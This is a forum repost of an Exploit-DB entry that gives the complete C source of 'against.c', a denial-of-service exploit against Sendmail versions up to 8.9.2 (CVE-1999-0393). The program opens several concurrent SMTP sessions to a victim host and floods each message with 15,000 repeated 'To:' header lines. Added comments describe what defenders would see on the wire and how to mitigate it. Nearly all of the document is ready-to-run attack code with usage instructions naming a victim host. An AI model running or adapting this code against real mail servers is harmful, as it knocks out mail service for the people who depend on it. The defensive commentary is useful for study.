Exploit Sendmail 8.9.2 - Headers Prescan Denial of Service

Exploiter

18 Дек 2022
EDB-ID
23167
Проверка EDB
  1. Пройдено
Автор
MARCHEW
Тип уязвимости
DOS
Платформа
IRIX
CVE
CVE-1999-0393
Дата публикации
1998-12-12
C:
/*
  against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
  (c) 1999 by <[email protected]>

  Usage: ./against existing_user_on_victim_host victim_host
  Example: ./against nobody lamers.net

*/

#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>

/* Number of child processes main() forks; each child opens one SMTP session. */
#define MAXCONN 4
/* Number of identical "To: x" header lines each child writes after "data". */
#define LINES   15000

/* Result of gethostbyname(argv[2]); main() reads h_addr, h_length and h_addrtype from it. */
struct hostent *hp;
/* Destination address for connect(); file-scope, so it starts zero-initialised. */
struct sockaddr_in s;
/*
 * suck - socket descriptor used by each child.
 * loop - reused three ways in main(): fork counter, per-child line counter,
 *        and (in the parent) the status word written by waitpid().
 * x    - return value of the most recent fork().
 */
int suck,loop,x;

/*
 * Proof-of-concept driver for the header-handling denial of service named in
 * the file header ("up to 8.9.2").
 *
 * argv[1] is the recipient user, argv[2] the mail host. The host is resolved
 * once, then MAXCONN children are forked. Each child connects to TCP port 25,
 * sends helo / mail from / rcpt to / data, writes LINES copies of the header
 * line "To: x", terminates the message, sends quit, and keeps the connection
 * open for a further 100 seconds before closing it.
 *
 * What a defender sees on the wire and in logs: several simultaneous SMTP
 * sessions from one client, each delivering a single message whose header
 * section consists of thousands of repeated "To:" lines followed by a tiny
 * body. Mitigations: run a Sendmail release newer than the range this file
 * names as affected, cap the total header size the MTA will accept (e.g.
 * Sendmail's MaxHeadersLength option where available; confirm against your
 * release), and limit concurrent connections per client address.
 *
 * Returns 0 from the parent; children leave through exit(0).
 */
int main(int argc,char* argv[]) {

  printf("against.c - another Sendmail DoS (up to 8.9.2)\n");

  /* argc-3 is non-zero unless exactly two arguments were supplied. */
  if (argc-3) {
printf("Usage: %s victim_user victim_host\n",argv[0]);
exit(0);
  }

  hp=gethostbyname(argv[2]);

  if (!hp) {
perror("gethostbyname");
exit(1);
  }

  fprintf(stderr,"Doing mess: ");

  /*
   * No initialiser: loop is a file-scope int and therefore starts at 0.
   * fork() returns 0 only in the child, so the braced body below runs in
   * each of the MAXCONN children and never in the parent.
   */
  for (;loop<MAXCONN;loop++) if (!(x=fork())) {
FILE* d;
/* Copy the first resolved address into the destination; port 25 is SMTP. */
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=hp->h_addrtype;
s.sin_port=htons(25);
/* NOTE(review): socket() and connect() failures are only reported via
   perror(); execution continues to fdopen() regardless. */
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
/* Wrap the socket in a write-only stdio stream; server replies are never read. */
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }

/* 100000 microseconds = 0.1 s pause before the SMTP dialogue is written. */
usleep(100000);

/* SMTP envelope: recipient is built as argv[1]@argv[2]. */
fprintf(d,"helo tweety\n");
fprintf(d,"mail from: [email protected]\n");
fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
fprintf(d,"data\n");

usleep(100000);

/*
 * Message headers: LINES identical "To: x" lines. The child reuses the
 * global loop as its counter; this is the child's own copy after fork(),
 * and the child exits below, so the outer fork loop is not re-entered.
 * Presumably this repeated-header block is what exercises the header
 * processing the page title refers to; the page gives no further detail.
 * A progress dot goes to stderr every 100 lines.
 */
for(loop=0;loop<LINES;loop++) {
  if (!(loop%100)) fprintf(stderr,".");
  fprintf(d,"To: x\n");
}

/* Blank line ends the header section; a short body follows. */
fprintf(d,"\n\n\nsomedata\n\n\n");

/* A line holding only "." terminates the DATA phase. */
fprintf(d,".\n");

sleep(1);

fprintf(d,"quit\n");
/* First explicit flush of the stdio buffer in this child. */
fflush(d);

/* The connection is held open for 100 s after quit before teardown. */
sleep(100);
/* how=2 shuts down both directions (commonly SHUT_RDWR). */
shutdown(suck,2);
close(suck);
exit(0);
  }

  /*
   * Parent only. x holds the pid returned by the last fork(), so only that
   * child is waited for; its exit status is written into loop.
   */
  waitpid(x,&loop,0);

  fprintf(stderr,"ok\n");

  return 0;
}
 
Источник
www.exploit-db.com
